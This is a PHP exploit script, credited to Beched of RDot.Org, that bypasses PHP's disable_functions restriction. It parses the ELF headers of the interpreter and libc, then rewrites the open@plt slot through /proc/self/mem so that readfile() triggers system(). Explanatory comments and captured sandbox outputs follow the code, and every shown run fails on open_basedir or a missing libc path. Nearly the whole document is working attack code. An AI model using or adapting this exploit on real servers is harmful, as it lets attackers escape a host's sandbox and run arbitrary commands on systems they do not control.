<?php
/*
 * Author's notes on how the offsets used below were obtained by hand:
 *
 * $libc_ver:
 * beched@linuxoid ~ $ php -r 'readfile("/proc/self/maps");' | grep libc
 * 7f3dfa609000-7f3dfa7c4000 r-xp 00000000 08:01 9831386 /lib/x86_64-linux-gnu/libc-2.19.so
 *
 * $open_php:
 * beched@linuxoid ~ $ objdump -R /usr/bin/php | grep '\sopen$'
 * 0000000000e94998 R_X86_64_JUMP_SLOT open
 *
 * $system_offset and $open_offset:
 * beched@linuxoid ~ $ readelf -s /lib/x86_64-linux-gnu/libc-2.19.so | egrep "\s(system|open)@@"
 * 1337: 0000000000046530 45 FUNC WEAK DEFAULT 12 system@@GLIBC_2.2.5
 * 1679: 00000000000ec150 90 FUNC WEAK DEFAULT 12 open@@GLIBC_2.2.5
 *
 * Review note: the script only works when the process can read /proc/self/exe,
 * read /proc/self/maps and write /proc/self/mem. In the captured runs below,
 * open_basedir does not include /proc, so the very first file_get_contents()
 * fails and the script exits at "[-] Failed"; the remaining warnings are the
 * parser touching variables that were never set because nothing was read.
 */

// Encodes an integer as 8 little-endian bytes: two 32-bit halves packed with 'V'
// (unsigned 32-bit LE). The high half is taken by masking and shifting.
function packlli($value) {
    $higher = ($value & 0xffffffff00000000) >> 32;
    $lower = $value & 0x00000000ffffffff;
    return pack('V2', $lower, $higher);
}

// Decodes a little-endian byte string into an unsigned integer by reversing the
// bytes, hex-encoding them and parsing with hexdec(). Note hexdec() returns a
// float once the value exceeds PHP_INT_MAX, so 8-byte inputs with the top bit
// set are not exact.
function unp($value) {
    return hexdec(bin2hex(strrev($value)));
}

// Minimal ELF64 reader over the raw file bytes of $bin_ver.
//
// Header fields read (ELF64 layout): e_shoff @0x28 (8 bytes), e_shentsize @0x3a,
// e_shnum @0x3c, e_shstrndx @0x3e (2 bytes each). For each section header the
// code reads sh_type (+4), sh_offset (+24), sh_size (+32) and sh_entsize (+56).
//
// With $rela = true it walks the SHT_RELA entries (r_offset at +0, symbol index
// = r_info >> 32 at +8), resolves each symbol's st_name through the string table
// and returns r_offset of the entry named 'open'; if no such entry exists the
// function falls off the end and returns null (no explicit return on that path).
//
// With $rela = false it walks SHT_DYNSYM entries (st_name at +0, 4 bytes;
// st_value at +8, 8 bytes) and returns [st_value of '__libc_system',
// st_value of '__open'] as a two-element array.
//
// Assumptions visible in the code, not validated: the file is ELF64 little-endian;
// the first SHT_STRTAB section encountered is the one SHT_DYNSYM names refer to
// (sh_link is never consulted); exactly one SHT_DYNSYM and, when $rela is set,
// at least one SHT_RELA section exist. If a section is missing, the
// corresponding $dynsym_*/$relaplt_*/$system_offset/$open_offset variables are
// left undefined and PHP emits the "Undefined variable" warnings seen in the
// captured output. $e_shstrndx and $strtab_size are read but never used.
// file_get_contents() failures are not checked; $bin is then false/empty and
// every substr() yields an empty string.
function parseelf($bin_ver, $rela = false) {
    $bin = file_get_contents($bin_ver);
    $e_shoff = unp(substr($bin, 0x28, 8));
    $e_shentsize = unp(substr($bin, 0x3a, 2));
    $e_shnum = unp(substr($bin, 0x3c, 2));
    $e_shstrndx = unp(substr($bin, 0x3e, 2));
    // Pass 1: locate the section tables by sh_type.
    for($i = 0; $i < $e_shnum; $i += 1) {
        $sh_type = unp(substr($bin, $e_shoff + $i * $e_shentsize + 4, 4));
        if($sh_type == 11) { // SHT_DYNSYM
            $dynsym_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
            $dynsym_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
            $dynsym_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
        }
        elseif(!isset($strtab_off) && $sh_type == 3) { // SHT_STRTAB (first one only)
            $strtab_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
            $strtab_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
        }
        elseif($rela && $sh_type == 4) { // SHT_RELA (last one wins if several)
            $relaplt_off = unp(substr($bin, $e_shoff + $i * $e_shentsize + 24, 8));
            $relaplt_size = unp(substr($bin, $e_shoff + $i * $e_shentsize + 32, 8));
            $relaplt_entsize = unp(substr($bin, $e_shoff + $i * $e_shentsize + 56, 8));
        }
    }
    // Pass 2: resolve symbol names through the string table.
    if($rela) {
        for($i = $relaplt_off; $i < $relaplt_off + $relaplt_size; $i += $relaplt_entsize) {
            $r_offset = unp(substr($bin, $i, 8));
            $r_info = unp(substr($bin, $i + 8, 8)) >> 32; // ELF64_R_SYM
            $name_off = unp(substr($bin, $dynsym_off + $r_info * $dynsym_entsize, 4));
            $name = '';
            // Read the NUL-terminated name; starts one byte early because of the pre-increment.
            $j = $strtab_off + $name_off - 1;
            while($bin[++$j] != "\0") {
                $name .= $bin[$j];
            }
            if($name == 'open') {
                return $r_offset;
            }
        }
        // Falls through to an implicit null return when 'open' is not found.
    }
    else {
        for($i = $dynsym_off; $i < $dynsym_off + $dynsym_size; $i += $dynsym_entsize) {
            $name_off = unp(substr($bin, $i, 4));
            $name = '';
            $j = $strtab_off + $name_off - 1;
            while($bin[++$j] != "\0") {
                $name .= $bin[$j];
            }
            if($name == '__libc_system') {
                $system_offset = unp(substr($bin, $i + 8, 8));
            }
            if($name == '__open') {
                $open_offset = unp(substr($bin, $i + 8, 8));
            }
        }
        // Both entries are undefined (warning + null) if the names were not seen.
        return array($system_offset, $open_offset);
    }
}

// ---- Entry point: the steps below are sequential and each exits on failure. ----
echo "[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org)\n";
// Bails unless uname reports x86_64; the ELF offsets above are 64-bit only.
if(strpos(php_uname('a'), 'x86_64') === false) {
    echo "[-] This exploit is for x64 Linux. Exiting\n";
    exit;
}
// Compares the first four characters of the kernel release numerically against
// the author's 2.98 threshold; only warns, does not exit.
if(substr(php_uname('r'), 0, 4) < 2.98) {
    echo "[-] Too old kernel (< 2.98). Might not work\n";
}
// Step 1: file offset of open's relocation slot inside the running interpreter.
// parseelf() returns null when it cannot find it, and `== 0` treats null as 0.
echo "[*] Trying to get open@plt offset in PHP binary\n";
$open_php = parseelf('/proc/self/exe', true);
if($open_php == 0) {
    echo "[-] Failed. Exiting\n";
    exit;
}
echo '[+] Offset is 0x' . dechex($open_php) . "\n";
// Step 2: find the mapped libc path. preg_match()'s result is not checked; when
// there is no "libc-" mapping, $r[1] is undefined (see the 8.0.13 / 7.4.33 output)
// and parseelf() is called with null.
$maps = file_get_contents('/proc/self/maps');
preg_match('#\s+(/.+libc\-.+)#', $maps, $r);
echo "[*] Libc location: $r[1]\n";
echo "[*] Trying to get open and system symbols from Libc\n";
list($system_offset, $open_offset) = parseelf($r[1]);
if($system_offset == 0 or $open_offset == 0) {
    echo "[-] Failed. Exiting\n";
    exit;
}
// Step 3: read the current slot value from process memory and derive the libc
// base from it. Neither fopen() nor fread() results are checked; the read handle
// is never closed before a second handle is opened for writing.
echo "[+] Got them. Seeking for address in memory\n";
$mem = fopen('/proc/self/mem', 'rb');
fseek($mem, $open_php);
$open_addr = unp(fread($mem, 8));
echo '[*] open@plt addr: 0x' . dechex($open_addr) . "\n";
$libc_start = $open_addr - $open_offset;
$system_addr = $libc_start + $system_offset;
echo '[*] system@plt addr: 0x' . dechex($system_addr) . "\n";
// Step 4: overwrite the slot in place, then trigger it through readfile().
// fwrite() returning 0/false is the only failure signal handled.
echo "[*] Rewriting open@plt address\n";
$mem = fopen('/proc/self/mem', 'wb');
fseek($mem, $open_php);
if(fwrite($mem, packlli($system_addr))) {
    echo "[+] Address written. Executing cmd\n";
    readfile('/usr/bin/id');
    exit;
}
echo "[-] Write failed. Exiting\n";
Output for 8.0.0 - 8.0.12, 8.0.14 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): Failed to open stream: Operation not permitted in /in/UXumO on line 34 Warning: Undefined variable $relaplt_off in /in/UXumO on line 59 Warning: Undefined variable $relaplt_off in /in/UXumO on line 59 Warning: Undefined variable $relaplt_size in /in/UXumO on line 59 [-] Failed. Exiting
Output for 8.0.13
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0x10006a0 Warning: Undefined array key 1 in /in/UXumO on line 109 [*] Libc location: [*] Trying to get open and system symbols from Libc Warning: Undefined array key 1 in /in/UXumO on line 111 Fatal error: Uncaught ValueError: Path cannot be empty in /in/UXumO:34 Stack trace: #0 /in/UXumO(34): file_get_contents('') #1 /in/UXumO(111): parseelf(NULL) #2 {main} thrown in /in/UXumO on line 34
Process exited with code 255.
Output for 7.4.33
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0x10006b8 Notice: Undefined offset: 1 in /in/UXumO on line 109 [*] Libc location: [*] Trying to get open and system symbols from Libc Notice: Undefined offset: 1 in /in/UXumO on line 111 Warning: file_get_contents(): Filename cannot be empty in /in/UXumO on line 34 Notice: Undefined variable: dynsym_off in /in/UXumO on line 74 Notice: Undefined variable: dynsym_off in /in/UXumO on line 74 Notice: Undefined variable: dynsym_size in /in/UXumO on line 74 Notice: Undefined variable: system_offset in /in/UXumO on line 88 Notice: Undefined variable: open_offset in /in/UXumO on line 88 [-] Failed. Exiting
Output for 7.0.0 - 7.0.33, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.31, 7.4.0 - 7.4.32
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): failed to open stream: Operation not permitted in /in/UXumO on line 34 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 [-] Failed. Exiting
Output for 7.3.32 - 7.3.33
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary [+] Offset is 0xfac5e0 [*] Libc location: [*] Trying to get open and system symbols from Libc Warning: file_get_contents(): Filename cannot be empty in /in/UXumO on line 34 [-] Failed. Exiting
Output for 5.5.0 - 5.5.38, 5.6.0 - 5.6.40
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Warning: file_get_contents(): open_basedir restriction in effect. File(/proc/self/exe) is not within the allowed path(s): (/tmp:/in:/etc) in /in/UXumO on line 34 Warning: file_get_contents(/proc/self/exe): failed to open stream: Operation not permitted in /in/UXumO on line 34 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 [-] Failed. Exiting
Output for 5.4.0 - 5.4.45
[*] PHP disable_functions procfs bypass (coded by Beched, RDot.Org) [*] Trying to get open@plt offset in PHP binary Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 Notice: Undefined variable: relaplt_size in /in/UXumO on line 59 Notice: Undefined variable: relaplt_off in /in/UXumO on line 59 [-] Failed. Exiting
